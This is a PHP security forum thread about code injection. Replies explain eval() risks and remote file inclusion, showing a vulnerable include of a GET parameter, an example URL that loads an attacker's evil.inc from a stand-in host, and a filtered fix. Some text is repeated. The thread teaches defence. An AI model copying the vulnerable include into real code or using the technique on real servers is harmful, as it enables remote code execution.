Hi everyone,
I'm new to the forum and thank you all for providing this security forum.
I can appreciate the idea of some malicious user injecting script into my html, or modifying my sql's with an sql injection, but is it possible for someone to inject php code using an unfiltered textarea (for example)?
Thanks.
PHP Injection
Moderator: General Moderators
- feyd
- Neighborhood Spidermoddy
- Posts: 31559
- Joined: Mon Mar 29, 2004 3:24 pm
- Location: Bothell, Washington, USA
possible yes, but for your scripts to actually run that it, you'd need some very specific code. eval() would have to be used, most likely. Although if you save data into a file and can be tricked into loading that file, that will do it too.
Thanks feyd.
(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)
(To keep threads on topic, i've begun another thread over at viewtopic.php?p=251801#251801 - your help over there would be also appreciated.)
- Maugrim_The_Reaper
- DevNet Master
- Posts: 2704
- Joined: Tue Nov 02, 2004 5:43 am
- Location: Ireland
If allow_url_fopen is enabled in your php.ini configuration, include() and require() calls can also accept a URL to the file to include. If this is possible, allowing an unfiltered/unvalidated variable to be a prepend to an include path can result in an attacker exploiting this remote capability to point the include request to a remote file they themselves have written. This is even more dangerous is they know enough information to be capable of accurately guessing your webroot and lower directory paths.
Simple example:
You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).
Now the attacker could simple store a PHP file called "evil.inc" at http://example.com/evil.inc and call the request (to your script):
http://www.yourserver.com/index.php?pag ... m/evil.inc
Result?
You include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.
Fix?
Check all user variables.
The solution here is to only allow alphabetic characters in the values - negating slash/period/colon characters means no url will be accepted to taint our script...
Simple example:
You create an application file which loads a database connection. You also include a file (perhaps as part of a simple front controller).
Code: Select all
// load database connection
if(isset($_GET['page']) && !empty($_GET['page'])) {
include($_GET['page'] . '.inc');
} else {
include('index.inc');
}
exit;http://www.yourserver.com/index.php?pag ... m/evil.inc
Result?
You include() will use the "page" GET variable, fetch and parse the evil.inc script, and execute it. If they know your application well enough (error messages are a huge help there) they can manage to do a lot - basically anything YOU could do from PHP on your server.
Fix?
Check all user variables.
Code: Select all
// load database connection
$clean = array(); // store filtered variables separately
// filter, filter, filter - check all characters are alphabetical (no colons, slashes, periods...)
if(isset($_GET['page']) && !empty($_GET['page']) && ctype_alpha($_GET['page'])) {
$clean['page'] = $_GET['page'];
} else {
$clean['page'] = 'index';
}
if($clean['page']) include($clean['page'] . '.inc');
exit;